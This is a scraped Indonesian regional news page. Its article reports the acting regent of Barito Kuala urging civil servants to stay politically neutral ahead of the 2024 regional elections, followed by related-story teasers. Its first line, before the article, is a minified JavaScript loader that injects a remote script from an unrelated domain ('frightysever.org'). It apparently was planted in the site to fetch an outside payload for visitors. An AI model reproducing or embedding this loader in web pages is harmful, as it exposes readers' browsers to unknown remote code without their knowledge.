(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, MARABAHAN – Penjabat (Pj) Bupati Barito Kuala (Batola), Dinansyah, yang dilantik oleh Menteri Dalam Negeri pada 11 Agustus 2024, menegaskan pentingnya menjaga netralitas Aparatur Sipil Negara (ASN) jelang Pemilihan Kepala Daerah (Pilkada) 2024.
Dalam apel yang digelar di halaman Kantor Pemerintah Kabupaten (Pemkab) Batola, Senin (19/08/2024), Dinansyah mengingatkan kepada seluruh ASN untuk tidak terlibat dalam kampanye atau mendukung calon kepala daerah dengan cara yang melanggar aturan.
Dinansyah menyampaikan bahwa sesuai dengan Undang-Undang Nomor 20 Tahun 2023, netralitas adalah asas yang wajib dipegang oleh setiap ASN.
“Setiap ASN diingatkan untuk tidak memberikan dukungan kepada calon kepala daerah atau wakil kepala daerah dengan cara ikut serta dalam kampanye,” ujar Dinansyah.
Lebih lanjut, Dinansyah menegaskan larangan bagi ASN untuk menjadi peserta kampanye dengan menggunakan atribut partai politik atau atribut PNS, mengarahkan ASN lain, serta menggunakan fasilitas negara atau membuat keputusan yang menguntungkan salah satu pasangan calon, baik sebelum, selama, maupun setelah masa kampanye.
Selain itu, Dinansyah juga mengingatkan seluruh ASN untuk tetap menjaga kebersamaan dan semangat Korps Pegawai Republik Indonesia dalam menghadapi situasi politik. Ia meminta agar ASN tetap netral dan tidak terpengaruh dalam mengambil tindakan yang mengarah pada keberpihakan.
“Saya minta kepada seluruh ASN untuk menjaga kondusifitas daerah kita. Mari kita kawal jalannya tahapan Pilkada 2024 dengan penuh kesadaran,” imbaunya.
Sebagai bagian dari komitmen tersebut, setelah apel, seluruh Kepala Dinas, Kepala Badan, dan Camat se-Barito Kuala menandatangani Pakta Integritas Netralitas ASN. Penandatanganan ini disaksikan oleh perwakilan Bawaslu dan Kepala Badan Kepegawaian Daerah di teras Aula Selidah Pemkab Batola sebagai bentuk dukungan terhadap pelaksanaan Pilkada yang aman dan damai. (www.kanalkalimantan.com/adv)
Reporter: adv
Editor: rdy
KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin H Muhammad Yamin HR menegaskan akan menindak pemilik Ruko… Read More
KANALKALIMANTAN.COM, JAKARTA — Ketua DPRD Kalimantan Selatan (Kalsel), H Supian HK menyampaikan tuntutan mahasiswa dari… Read More
KANALKALIMANTAN.COM, BANJARMASIN — Sebanyak 275 Aparatur Sipil Negara (ASN) di lingkungan Pemerintah Kota (Pemko) Banjarmasin… Read More
KANALKALIMANTAN.COM, BANJARMASIN - Balai Wilayah Sungai (BWS) Kalimantan III menyatakan kesiapan mempercepat pembangunan Bendungan Riam… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Bupati Kapuas H Muhammad Wiyatno melakukan kunjungan kerja sekaligus audiensi dengan… Read More
KANALKALIMANTAN.COM, BANJARMASIN — Masyarakat di Kota Banjarmasin sangat terpukul dengan kebijakan penonaktifan massal kepesertaan BPJS… Read More
This website uses cookies.